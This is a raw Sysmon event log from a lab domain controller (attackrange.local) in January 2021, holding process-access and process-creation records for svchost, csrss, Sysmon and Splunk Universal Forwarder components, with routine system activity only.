13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-43AA-6000-FF00-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43AA-6000-FF00-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:18.408{08A6967A-43AA-6000-FF00-000000009A01}4004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:19.127{08A6967A-43AA-6000-0001-000000009A01}35324496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43AC-6000-0101-000000009A01}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-43AC-6000-0101-000000009A01}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43AC-6000-0101-000000009A01}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:20.315{08A6967A-43AC-6000-0101-000000009A01}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.803{08A6967A-43B5-6000-0301-000000009A01}23324960C:\Windows\system32\conhost.exe{08A6967A-43B5-6000-0201-000000009A01}3128C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-43B5-6000-0301-000000009A01}2332C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004611Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004610Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:29.787{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004609Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 